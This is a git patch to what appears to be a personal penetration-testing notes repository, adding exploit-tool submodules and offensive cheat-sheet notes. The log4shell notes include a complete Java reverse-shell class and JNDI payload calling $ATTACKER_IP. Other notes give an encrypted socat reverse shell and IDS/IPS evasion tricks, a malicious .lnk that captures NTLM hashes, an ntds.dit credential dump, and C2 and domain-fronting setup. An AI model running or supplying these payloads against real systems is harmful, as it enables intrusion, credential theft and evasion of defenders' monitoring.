From a3a6f09472bdcae1d9777e9a73f10df0d7bc6ed7 Mon Sep 17 00:00:00 2001
From: whx
Date: Thu, 10 Mar 2022 01:31:54 +0100
Subject: [PATCH] bump
---
 .gitmodules | 21 +++++
 enumeration/docs/ldap.md | 15 ++++
 .../network_scanners/kotlin-port-scanner | 1 +
 exfiltration/windows/evil-winrm.md | 5 ++
 exploit/java/log4shell.md | 44 ++++++++++-
 .../CVE-2022-0847-dirty-pipe-exploit | 1 +
 exploit/macOS/DS_Store_crawler_parser | 1 +
 exploit/macOS/Python-dsstore | 1 +
 exploit/macOS/ds_store_exp | 1 +
 exploit/windows/docs/lnk_exploit.md | 14 ++++
 misc/hadoop.md | 57 +++++++++++++
 misc/level3_hypervisor/docker_sec/docker.md | 15 +++-
 pivoting.md | 4 +
 post_exploitation/armitage | 1 +
 post_exploitation/docs/c2.md | 41 ++++++++++
 post_exploitation/docs/ids_ips_evation.md | 79 +++++++++++++++++++
 post_exploitation/docs/metasploit.md | 30 +++++++
 .../docs/windows/sebackupprivilege.md | 8 +-
 post_exploitation/powershell | 1 +
 19 files changed, 333 insertions(+), 7 deletions(-)
 create mode 100644 enumeration/docs/ldap.md
 create mode 160000 enumeration/network_scanners/kotlin-port-scanner
 create mode 160000 exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
 create mode 160000 exploit/macOS/DS_Store_crawler_parser
 create mode 160000 exploit/macOS/Python-dsstore
 create mode 160000 exploit/macOS/ds_store_exp
 create mode 100644 exploit/windows/docs/lnk_exploit.md
 create mode 100644 misc/hadoop.md
 create mode 160000 post_exploitation/armitage
 create mode 100644 post_exploitation/docs/ids_ips_evation.md
 create mode 160000 post_exploitation/powershell
diff --git a/.gitmodules b/.gitmodules
index 06838ac..be02fd9 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -139,3 +139,24 @@
 [submodule "exploit/windows/printspoofer"]
 path = exploit/windows/printspoofer
 url = https://github.com/dievus/printspoofer.git
+[submodule "post_exploitation/powershell"]
+ path = post_exploitation/powershell
+ url = https://github.com/puckiestyle/powershell.git
+[submodule "enumeration/network_scanners/kotlin-port-scanner"]
+ path = enumeration/network_scanners/kotlin-port-scanner
+ url = https://github.com/Hydragyrum/kotlin-port-scanner.git
+[submodule "exploit/macOS/ds_store_exp"]
+ path = exploit/macOS/ds_store_exp
+ url = https://github.com/lijiejie/ds_store_exp.git
+[submodule "exploit/macOS/DS_Store_crawler_parser"]
+ path = exploit/macOS/DS_Store_crawler_parser
+ url = https://github.com/anantshri/DS_Store_crawler_parser.git
+[submodule "exploit/macOS/Python-dsstore"]
+ path = exploit/macOS/Python-dsstore
+ url = https://github.com/gehaxelt/Python-dsstore.git
+[submodule "post_exploitation/armitage"]
+ path = post_exploitation/armitage
+ url = https://gitlab.com/kalilinux/packages/armitage.git
+[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
+ path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
+ url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
diff --git a/enumeration/docs/ldap.md b/enumeration/docs/ldap.md
new file mode 100644
index 0000000..97959c3
--- /dev/null
+++ b/enumeration/docs/ldap.md
@@ -0,0 +1,15 @@
+# LDAP
+
+## Get Domain
+
+```sh
+ ldapsearch -x -h $TARGET_IP -s base namingcontexts
+```
+
+## Domain Dump
+
+* If a set of credentials are known via
+```sh
+ldapdomaindump $TARGET_IP -u '\' -p '' --no-json --no-grep
+```
+* Take a look at the genreated HTML files
diff --git a/enumeration/network_scanners/kotlin-port-scanner b/enumeration/network_scanners/kotlin-port-scanner
new file mode 160000
index 0000000..54bfab4
--- /dev/null
+++ b/enumeration/network_scanners/kotlin-port-scanner
@@ -0,0 +1 @@
+Subproject commit 54bfab4c7cd09f9a6d50280af00f1984d5430a1e
diff --git a/exfiltration/windows/evil-winrm.md b/exfiltration/windows/evil-winrm.md
index 1d7988d..80f288d 100644
--- a/exfiltration/windows/evil-winrm.md
+++ b/exfiltration/windows/evil-winrm.md
@@ -1,6 +1,11 @@
 # Evil-winrm
+
 * Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
 ```sh
 download C:\Windows\Temp\
 ```
+* The other way
+```
+upload yadayda
+```
diff --git a/exploit/java/log4shell.md b/exploit/java/log4shell.md
index 87f8e99..9768e5e 100644
--- a/exploit/java/log4shell.md
+++ b/exploit/java/log4shell.md
@@ -37,7 +37,7 @@ X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
 * A Proxy LDAP server to an HTTP server is needed
 * Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
-```sh
+```java
 public class Exploit {
 static {
 try {
@@ -48,12 +48,52 @@ public class Exploit {
 }
 }
 ```
+or another one
+```java
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+public class Exploit {
+ static {
+ String host = "$ATTACKER_IP";
+ int port = 4711;
+ String cmd = "/bin/sh";
+ try {
+ Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
+ Socket s = new Socket(host, port);
+ InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
+ OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+ while (!s.isClosed()) {
+ while (pi.available() > 0)
+ so.write(pi.read());
+ while (pe.available() > 0)
+ so.write(pe.read());
+ while (si.available() > 0)
+ po.write(si.read());
+ so.flush();
+ po.flush();
+ Thread.sleep(50);
+ try {
+ p.exitValue();
+ break;
+ } catch (Exception e) {
+ }
+ }
+ p.destroy();
+ s.close();
+ } catch (Exception e) {
+ }
+ }
+}
+```
+
 * Run the LDAP, HTTP and reverse shell
 ```sh
 java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
 ```
 ```sh
-php -S 0.0.0.:8000
+php -S 0.0.0.0:8000
 ```
 ```sh
 nc -lvnp 4449
diff --git a/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit b/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
new file mode 160000
index 0000000..e1fd1f6
--- /dev/null
+++ b/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
@@ -0,0 +1 @@
+Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330
diff --git a/exploit/macOS/DS_Store_crawler_parser b/exploit/macOS/DS_Store_crawler_parser
new file mode 160000
index 0000000..9e003a3
--- /dev/null
+++ b/exploit/macOS/DS_Store_crawler_parser
@@ -0,0 +1 @@
+Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be
diff --git a/exploit/macOS/Python-dsstore b/exploit/macOS/Python-dsstore
new file mode 160000
index 0000000..859781b
--- /dev/null
+++ b/exploit/macOS/Python-dsstore
@@ -0,0 +1 @@
+Subproject commit 859781b834244774cb509e96ccc29ee646f72739
diff --git a/exploit/macOS/ds_store_exp b/exploit/macOS/ds_store_exp
new file mode 160000
index 0000000..784eada
--- /dev/null
+++ b/exploit/macOS/ds_store_exp
@@ -0,0 +1 @@
+Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7
diff --git a/exploit/windows/docs/lnk_exploit.md b/exploit/windows/docs/lnk_exploit.md
new file mode 100644
index 0000000..6addcb0
--- /dev/null
+++ b/exploit/windows/docs/lnk_exploit.md
@@ -0,0 +1,14 @@
+# .lnk exploit
+
+* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
+* [mamachine's tool](http://mamachine.org/mslink/index.en.html)
+
+* Target does not even have to open the link directly
+
+```sh
+mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
+```
+* Start a responder and wait for user's hash
+```sh
+responder -I eth0
+```
diff --git a/misc/hadoop.md b/misc/hadoop.md
new file mode 100644
index 0000000..cd9a950
--- /dev/null
+++ b/misc/hadoop.md
@@ -0,0 +1,57 @@
+# Hadoop
+
+Distributed storage and computing
+* [Hadoop Attack Libs](https://github.com/wavestone-cdt/hadoop-attack-library.git)
+
+## Terminology
+* __Cluster__, forms the datalake
+* __Node__, single host inside the cluster
+* __NameNode__, node that keeps the dir tree of the Hadoop file system
+* __DataNode__, slave node that stores files and is instructed by the NameNode
+* __Primary NameNode__, current active node responsible for keeping the directory structure
+* __Secondary NameNode__, hot standby for Primary NameNode. There may be multiple on standby inside the cluster
+* __Master Node__, Hadoop management app like HDFS or YARN Manager
+* __Slave Node__, Hadoop worker like HDFS or MapReduce. a node can be master and slave at the same time
+* __Edge Node__, hosting Hadoop user app like Zeppelin or Hue
+* __Kerberised__, security enabled cluster through Kerberos
+
+* __HDFS__, Hadoop Distributed File System, storage device for unstructured data
+* __Hive__, primary DB for structured data
+* __YARN__, scheduling jobs and resource management
+* __MapReduce__, distributed filtering, sorting and reducing
+* __HUE__, GUI for HDFS and Hive
+* __Zookeeper__, cluster management
+* __Kafka__, message broker
+* __Ranger__, privileged ACL
+* __Zeppelin__, data analytivs inside a webUI
+
+## Zeppelin
+
+* Try [default logins](https://zeppelin.apache.org/docs/0.8.2/setup/security/shiro_authentication.html#4-login)
+* Try execution inside notebooks
+
+## Ktabs
+
+* Finding `ktpass`es to authenticate at the kerberos TGS
+* Output principals and use them to init
+```sh
+klist -k
+kinit -k -V -t
+```
+
+## HDFS
+
+* User the `hdfs` utility to enumerate the distributed network storage
+```sh
+hdfs dfs -ls /
+```
+* Current user and user on the storage do not have to correspond
+* Touched files on the storage may be owned by root
+```sh
+hdfs dfs -touchz testfile /tmp/testfile
+hdfs dfs -ls /tmp
+```
+* Impersonate by sourcing keytab file of the user, __NodeManager__ is the highest user in regards to permission
+
+
+
diff --git a/misc/level3_hypervisor/docker_sec/docker.md b/misc/level3_hypervisor/docker_sec/docker.md
index f1cc794..6612c62 100644
--- a/misc/level3_hypervisor/docker_sec/docker.md
+++ b/misc/level3_hypervisor/docker_sec/docker.md
@@ -125,7 +125,20 @@ curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.s
 ```sh
 curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers//start
 ```
-* Login in to the host via ssh
+* Login in to the host via ssh remotely or socat locally
+```sh
+socat - UNIX-CONNECT:/var/run/docker.sock
+POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+Host:
+Connection: Upgrade
+Upgrade: tcp
+
+HTTP/1.1 101 UPGRADED
+Content-Type: application/vnd.docker.raw-stream
+Connection: Upgrade
+Upgrade: tcp
+```
+
 ## Escape through DB
 * Login into DB
diff --git a/pivoting.md b/pivoting.md
index 1cb613e..7c9257b 100644
--- a/pivoting.md
+++ b/pivoting.md
@@ -60,6 +60,10 @@ cmd.exe /c echo y | .\plink.exe -R :: @ -o key.ppk
 ```
+* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d)
+```sh
+echo y | &.\plink.exe -ssh -l -pw -R ::127.0.0.1:
+```
 ### Socat
 * Reverse shell on target via
diff --git a/post_exploitation/armitage b/post_exploitation/armitage
new file mode 160000
index 0000000..d07b022
--- /dev/null
+++ b/post_exploitation/armitage
@@ -0,0 +1 @@
+Subproject commit d07b0227e9ba0dc6de0c688a44ed17803c5216c6
diff --git a/post_exploitation/docs/c2.md b/post_exploitation/docs/c2.md
index 980ecdf..4b43462 100644
--- a/post_exploitation/docs/c2.md
+++ b/post_exploitation/docs/c2.md
@@ -2,3 +2,44 @@
 * [Matrix](https://www.thec2matrix.com/)
 * [bcsecurity](https://www.bc-security.org/) maintains Empire 4
+* [Empire](https://github.com/BC-SECURITY/Empire.git)
+* [Armitage](https://gitlab.com/kalilinux/packages/armitage.git)
+* [Covenant](https://github.com/cobbr/Covenant)
+* [Sliver](https://github.com/BishopFox/sliver)
+
+* Server
+ * Listener
+* Payloads/Agents
+ * Staged/Dropper
+ * Stageless
+* Beacons from Agents, disguised through jitter
+* Modules
+ * Post Exploitation
+ * Pivoting
+
+## Domain Fronting
+
+* Use a Domain on the C2 server
+* User Cloudflare to proxy the request and responses to and from the target
+* Use HTTPs for channel encryption
+
+## Profiles
+
+* Server evaluates by custom user-agents to identify agents
+
+## Types
+
+* Std listener, TCP or UDP
+* HTTP/HTTPS, counter FW
+* DNS, if internet access of the target is flaky
+* SMB, counter network segments
+
+## Redirector
+
+* Apache or nginx as reverse proxy in front of the c2 server
+* FW is still needed in front of the redirector
+* These get burned instead of the c2
+
+
+
+
diff --git a/post_exploitation/docs/ids_ips_evation.md b/post_exploitation/docs/ids_ips_evation.md
new file mode 100644
index 0000000..4365a8c
--- /dev/null
+++ b/post_exploitation/docs/ids_ips_evation.md
@@ -0,0 +1,79 @@
+# IDS & IPS Evation
+
+* Evation by manipulation of
+ * Protocol
+ * Payload
+ * Route
+ * Or DoS
+
+## Protocol Manipulation
+
+### Relying on another protocol
+* `nc -ulvnp 4711` for listening to incoming UDP traffic
+* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP
+
+### Manipulation of the source's or LHOST's network port
+* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it
+
+### Session splicing by fragmentation and segmentation
+* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu ` for MTU
+* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag ` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP`
+
+### Sending invalid packets
+* Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN`
+* `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R`
+
+## Payload Manipulation
+
+### Obfuscation and Encoding
+* Base64
+* URL
+* Escaped Unicode Characters
+
+### Encrypting Communication Channels
+* Use socat with encryption
+```sh
+openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
+```
+* Create `.pem` (Privacy Enhanced Mail) file via
+```
+cat id_rsa.key reverse.crt > reverse.pem
+```
+* Listening on attacker side
+```sh
+socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
+```
+* On target
+```sh
+socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
+```
+
+### Modification of Data
+* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl`
+* Adding whitespaces to the commands
+* Use aliases
+
+## Route Manipulation
+
+### Relying on Source Routing
+* `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely
+* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly
+
+### Using Proxyy Servers
+* `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP`
+
+## Tactical DoS
+* Non malicious, benign traffic against
+ * IDS/IPS
+ * Logging server
+
+## MISC
+
+* Changing
+ * `User-Agent`
+ * Request frequency and duration of sleep
+ * SSL/TLS certs
+ * DNS beacon, storing exfiltrated data in the query
+
+
+
diff --git a/post_exploitation/docs/metasploit.md b/post_exploitation/docs/metasploit.md
index 5de49ff..0c09c75 100644
--- a/post_exploitation/docs/metasploit.md
+++ b/post_exploitation/docs/metasploit.md
@@ -58,3 +58,33 @@ set PAYLOAD windows/meterpreter/reverse_http
 run -j
 ```
 * Copy into powershell/cmd
+
+
+## Reverse Proxy
+
+* Hide behind reverse proxy, e.g. apache
+* In case of an apache, these modules must be enabled
+ * rewrite
+ * proxy
+ * proxy_http
+ * headers
+* Use `User-Agent` to identify targets
+```ucl
+
+
+ ServerAdmin webmaster@localhost
+ DocumentRoot /var/www/html
+
+ RewriteEngine On
+ RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
+ ProxyPass "/" "http://localhost:8080/"
+
+
+ AllowOverride All
+
+
+ ErrorLog ${APACHE_LOG_DIR}/error.log
+ CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+
+```
diff --git a/post_exploitation/docs/windows/sebackupprivilege.md b/post_exploitation/docs/windows/sebackupprivilege.md
index b8f6537..8bace4b 100644
--- a/post_exploitation/docs/windows/sebackupprivilege.md
+++ b/post_exploitation/docs/windows/sebackupprivilege.md
@@ -6,21 +6,21 @@
 * Check `whoami /all`
 * `SeBackupPrivilege` must be present
 * [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
-* Upload `diskshadow.txt` to the target with the following content
+* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
 ```sh
 set metadata C:\tmp\tmp.cabs
 set context persistent nowriters
 add volume c: alias someAlias
 create
-expose %someAlias% h:
+expose %someAlias% h:
 ```
-* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt`
+* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
 * Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
 ```sh
 import-module .\SeBackupPrivilegeUtils.dll
 import-module .\SeBackupPrivilegeCmdLets.dll
 copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
-reg save HKLM\SYSTEM C:\Path\to\uploads\system
+reg save HKLM\SYSTEM C:\tmp\system
 ```
 * Downloads the files `ntds.dit` and `system`
 * Extract the hashes via
diff --git a/post_exploitation/powershell b/post_exploitation/powershell
new file mode 160000
index 0000000..81e5fba
--- /dev/null
+++ b/post_exploitation/powershell
@@ -0,0 +1 @@
+Subproject commit 81e5fba23f24fb74eaabeeb8665c9f9dff4c535b